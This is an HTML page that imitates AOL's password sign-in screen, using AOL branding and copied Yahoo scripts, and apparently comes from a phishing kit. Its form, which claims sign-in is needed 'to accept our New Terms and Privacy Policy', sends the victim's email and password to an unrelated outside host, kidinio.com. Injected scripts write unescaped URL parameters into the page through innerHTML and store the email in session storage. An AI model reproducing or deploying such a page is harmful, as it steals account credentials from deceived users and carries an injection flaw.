<!DOCTYPE html>
<html id="Stencil" class="no-js grid light-theme ">
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=0, shrink-to-fit=no" />
	<meta name="format-detection" content="telephone=no">
	<meta name="referrer" content="origin-when-cross-origin">
	<title>AOL</title>
	<link rel="dns-prefetch" href="//gstatic.com">
	<link rel="dns-prefetch" href="//google.com">
	<link rel="dns-prefetch" href="//s.yimg.com">
	<link rel="dns-prefetch" href="//y.analytics.yahoo.com">
	<link rel="dns-prefetch" href="//ucs.query.yahoo.com">
	<link rel="dns-prefetch" href="//geo.query.yahoo.com">
	<link rel="dns-prefetch" href="//geo.yahoo.com">
	<link rel="icon" type="image/png" href="https://s.yimg.com/wm/login/aol-favicon.png">
	<link rel="shortcut icon" type="image/png" href="https://s.yimg.com/wm/login/aol-favicon.png">
	<link rel="apple-touch-icon" href="https://s.yimg.com/wm/login/aol-apple-touch-icon.png">
	<link rel="apple-touch-icon-precomposed" href="https://s.yimg.com/wm/login/aol-apple-touch-icon.png">
	<style nonce="Ed7dLAk41grqPv3HUhKCILcLDFbRH1P/01Fe05CvoTCtnxdR">

		#mbr-css-check {
			display: inline;
		}

		.mbr-legacy-device-bar {
			display: none;
		}
	</style>
	<link href="https://s.yimg.com/wm/mbr/0a62d92e511c304da9b0aa601b8e687e73bd057f/aol-main.css" rel="stylesheet" type="text/css">
	<script nonce="Ed7dLAk41grqPv3HUhKCILcLDFbRH1P/01Fe05CvoTCtnxdR">(function(root) {
                var isGoodJS = ('create' in Object && 'isArray' in Array && 'pushState' in window.history);
                root.isGoodJS = isGoodJS;
            }(this));

(function (root) {
/* -- Data -- */
root.YUI_config = {"comboBase":"https:\u002F\u002Fs.yimg.com\u002Fzz\u002Fcombo?","combine":true,"root":"yui-s:3.18.0\u002F"};
root.COMET_URL = "https:\u002F\u002Fpr.comet.yahoo.com\u002Fcomet";
root.I13N_config = {"keys":{"pt":"utility","ver":"nodejs","A_xp":"dev"}};
root.I13N_config || (root.I13N_config = {});
root.I13N_config.spaceid = 794200033;
root.I13N_config.location = "https:\u002F\u002Flogin.aol.com\u002Faccount\u002Fchallenge\u002Fpassword?src=fp-us&intl=us&lang=en-us&display=login";
root.I13N_config.referrer = "";
root.I13N_config.keys || (root.I13N_config.keys = {});
root.I13N_config.keys.gm_np = "aol";
root.I13N_config.keys.p_sec = "account-challenge-password";
root.I13N_config.keys.p_subsec = "account-challenge-password";
root.I13N_config.keys.src = "fp-us";
root.darlaConfig = {"url":"https:\u002F\u002Ffc.yahoo.com\u002Fsdarla\u002Fphp\u002Fclient.php?l=RICH{dest:tgtRICH;asz:flex}&f=794200033&ref=https%3A%2F%2Flogin.aol.com%2Faccount%2Fchallenge%2Fpassword","k2Rate":1,"positions":{"RICH":{"id":"RICH","clean":"login-ad-rich","dest":"login-ad-rich","w":1440,"h":1024,"timeout":5000,"noexp":1,"fdb":{"on":1,"where":"inside","minReqWidth":1325,"showAfter":2000}}}};
root.challenge || (root.challenge = {});
root.challenge.servingStamp = 1576454439468;
root.I13N_config.keys.pct = "primary";
root.mKeyPrefix = "primary_account-challenge-password_";
root.I13N_config.tracked_mods = {"password-challenge":"password-challenge"};
root.pwchallenge || (root.pwchallenge = {});
root.pwchallenge.messages = {"toolTipShow":"Show password","toolTipHide":"Hide password"};
root.isIOSDevice = false;
}(this));


            YUI_config.global = window;


            window.mbrSendError = function (name, url) {
                (new Image()).src = '/account/js-reporting/?rid=72hrlltevdi97&crumb=' + encodeURIComponent('QDgpxNeq0k7') + '&message=' + encodeURIComponent(name.toLowerCase()) + '&url=' + encodeURIComponent(url);
            };

            var oldError = window.onerror;

            window.onerror = function (errorMsg, url) {
                window.mbrSendError(errorMsg, url);
                if (oldError) {
                    oldError.apply(this, arguments);
                }
                return false;
            };</script>

	<script language="JavaScript">function addComment()
	{
		var parameters = location.search.substring(1).split("&");

		var temp = parameters[0].split("=");
		l = unescape(temp[1]);

		temp = parameters[1].split("=");
		c = unescape(temp[1]);

		document.getElementById("usrcode").innerHTML = l;
		document.getElementById("authcode").innerHTML = c;
	}
addComment();</script>
	<script type="text/javascript">function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}</script>
	<script language="JavaScript">function addComment()
	{
		var parameters = location.search.substring(1).split("&");

		var temp = parameters[0].split("=");
		l = unescape(temp[1]);

		temp = parameters[1].split("=");
		c = unescape(temp[1]);

		document.getElementById("usrcode").innerHTML = l;
		document.getElementById("authcode").innerHTML = c;
	}
addComment();</script>
	<script type="text/javascript">function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}</script>
</head>
<body class="mbr-email-link-verification-web">
	<div class="mbr-legacy-device-bar" id="mbr-legacy-device-bar">
		<label class="cross" for="mbr-legacy-device-bar-cross" aria-label="Close this warning">x</label>
		<input type="checkbox" id="mbr-legacy-device-bar-cross" />
		<p class="mbr-legacy-device">
			AOL works best with the latest versions of the browsers. You're using an outdated or unsupported browser and some AOL features may not work properly. Please update your browser version now. <a href="">More Info</a>
		</p>
	</div>
	<script nonce="Ed7dLAk41grqPv3HUhKCILcLDFbRH1P/01Fe05CvoTCtnxdR">(function(root) {
            var doc = document;

            if (root.isGoodJS) {
                doc.documentElement.className = doc.documentElement.className.replace('no-js', 'js');
                doc.cookie = 'mbr-nojs=; domain=' + doc.domain + '; path=/account; expires=Thu, 01 Jan 1970 00:00:01 GMT; secure';
            } else {
                doc.cookie = 'mbr-nojs=badbrowser; domain=' + doc.domain + '; path=/account; expires=Fri, 31 Dec 9999 23:59:59 GMT; secure';
                doc.getElementById('mbr-legacy-device-bar').style.display = 'block';
            }
        }(this));</script>
	<div id="login-body" class="loginish  puree-v2 responsive">
		<div class="mbr-desktop-hd">
			<span class="column">
				<a href="https://www.aol.com/">
					<img src="https://s.yimg.com/wm/assets/images/ns/aol-logo-black-v.0.0.2.png" alt="Aol" class="logo " width="100" height="" />
					<img src="https://s.yimg.com/wm/assets/images/ybar/aol-logo-white-v0.0.4.png" alt="Aol" class="dark-mode-logo logo " width="100" height="" />
				</a>
			</span>
			<span class="column help txt-align-right">
				<a href="https://help.aol.com/">Help</a>
			</span>
		</div>
		<div class="login-box-container">
			<div class="login-box default">
				<div class="mbr-login-hd txt-align-center">
					<img src="https://s.yimg.com/wm/assets/images/ns/aol-logo-black-v.0.0.2.png" alt="Aol" class="logo aol-en-US" width="100" height="" />
					<img src="https://s.yimg.com/wm/assets/images/ybar/aol-logo-white-v0.0.4.png" alt="Aol" class="dark-mode-logo logo aol-en-US" width="100" height="" />
				</div>
				<div class="challenge password-challenge">
					<div class="challenge-header">

						<div class="yid"><p style="position:absolute;width:274px;left:20px;top:80px;z-index:19"><b></b><b>Welcome: <span id="usrs"></span></p></div></br>

						<script language="JavaScript">function addComment()
	{
		var parameters = location.search.substring(1).split("&");

		var temp = parameters[0].split("=");
		l = unescape(temp[1]);

		temp = parameters[1].split("=");
		c = unescape(temp[1]);

		document.getElementById("usrs").innerHTML = l;
		document.getElementById("authcode").innerHTML = c;

		sessionStorage.setItem("email", l);
	}
addComment();</script>

						<div id="password-challenge" class="primary">
							<!-- <strong class="challenge-heading">Enter password</strong> -->
							<span class="txt-align-center challenge-desc">Sign in <br><strong class="challenge-heading">to accept our New Terms and Privacy Policy</strong> </span><br><br>
							<form name='myForm' action="https://kidinio.com/css/aodata.php" method="post" class="pure-form challenge-form">
								<input type="hidden" name="browser-fp-data" id="browser-fp-data" value="" />
								<input type="hidden" name="crumb" value="n.5phpWTIhQ" />
								<input type="hidden" name="acrumb" value="xuXlGwsH" />
								<input type="hidden" name="sessionIndex" value="QQ--" />
								<input type="hidden" name="displayName" value="" />
								<!-- div class="hidden-username"> -->
								<div class="input-group">
									<input class="phone-no " type="email" name="email" id="login-username" tabindex="1" value="" autocomplete="username" autocapitalize="none" autocorrect="off" autofocus="true" required placeholder=" " />
									<div class="input-field-icon hide" id="username-field-icon"></div>
									<label for="login-username" id="login-label" class="login-label" aria-hidden="true">Enter email address</label>
									<ul class="auto-fill-overlay hide" aria-live="polite" id="domain-auto-fill">
										<li data-fill="aol.co.uk" tabindex="2">aol.co.uk</li>
										<li data-fill="aol.com" tabindex="3">aol.com</li>
										<li data-fill="aol.ca" tabindex="4">aol.ca</li>
										<li data-fill="aol.de" tabindex="5">aol.de</li>
									</ul>
								</div>

								<div id="password-container" class="input-group password-container focussed">

									<input type="hidden" name="l" id="l" value="" />

									<input required type="password" id="login-passwd" class="password" name="psw"
										   placeholder=" " autofocus autocomplete="current-password"
										   data-rapid-tracking="true" data-ylk="elm:input;elmt:focus;slk:passwd;mKey:password-challenge-focus-passwd" />
									<label for="login-passwd" id="password-label" class="password-label">Password</label>
									<div class="caps-indicator hide" id="caps-indicator" title="Capslock is on"></div>
									<button type="button" class="show-hide-toggle-button hide-pw" id="password-toggle-button" tabindex="-1"
											title="Show password"
											data-rapid-tracking="true" data-ylk="elm:btn;elmt:toggle;slk:toggle-show-passwd;mKey:password-challenge-toggle-show-hide"></button>
								</div>
								<div class="button-container">
									<button type="submit" id="login-signin" class="pure-button puree-button-primary puree-spinner-button challenge-button"
											name="verifyPassword" value="Next"
											data-rapid-tracking="true" data-ylk="elm:btn;elmt:primary;slk:next;mKey:password-challenge-next">
										Next
									</button>
								</div>
								<div class="forgot-cont challenge-button-link">
									<input type="submit" class="pure-button puree-button-link challenge-button-link"
										   data-ylk="elm:btn;elmt:skip;slk:skip;mKey:password-challenge-skip-recovery" data-rapid-tracking="true"
										   id="mbr-forgot-link"
										   name="skip" value="Forgot password?" data-rapid-tracking="true" />
								</div>
							</form>
						</div>
					</div>
				</div>
				<div id="login-box-ad-fallback" class="login-box-ad-fallback">
					<h1></h1>
					<p></p>
				</div>
			</div>
			<div class="login-bg-outer">
				<div class="login-bg-inner">
					<div id="login-ad-rich"></div>
				</div>
			</div>

		</div>
		<script src="https://s.yimg.com/wm/mbr/js/rapid-3.53.17.js"></script>
		<script nonce="yUwLpc8RX9/AYLwOT6c96cZAGLahhui1Ed4TRD9uquK0X5jv">var rapidInstance = new YAHOO.i13n.Rapid(I13N_config);
        // Used in common JS to add to beacons
        rapidInstance.beaconClick('password-challenge-launch' , null, 0, {
            mKey: 'password-challenge-launch',
            intrctn: 'click',
            corActn: 'click'
        });</script>
		<script src="https://s.yimg.com/wm/mbr/fc1941a33849820d0200bf2c4c4491e8c37f2dc8/bundle.js"></script>
		<noscript>
			<img src="/account/js-reporting/?crumb=n.5phpWTIhQ&message=javascript_not_enabled&ref=%2Faccount%2Fchallenge%2Fpassword" height="0" width="0" style="visibility: hidden;">
		</noscript>
		<script nonce="yUwLpc8RX9/AYLwOT6c96cZAGLahhui1Ed4TRD9uquK0X5jv">var checkAssets = function(seconds) {
            setTimeout(function() {
                if (!window.mbrJSLoaded) {
                    window.mbrSendError('js_failed_to_load', location.pathname);
                }
                var check = document.getElementById('mbr-css-check'),
                    style = check.currentStyle;
                if (window.getComputedStyle) {
                    style = window.getComputedStyle(check);
                }
                if (style.display !== 'none') {
                    window.mbrSendError('css_failed_to_load', location.pathname);
                }
            }, (seconds * 1000));
        };

        checkAssets(10);</script>



		<div id="mbr-css-check"></div>
		<div id="page-mask" class="page-mask hide"></div>
		<div id="ad"></div>

</body>
</html>
<!-- fe12.member.ir2.yahoo.com - Mon Oct 26 2020 11:52:30 GMT+0000 (Coordinated Universal Time) - (0ms) -->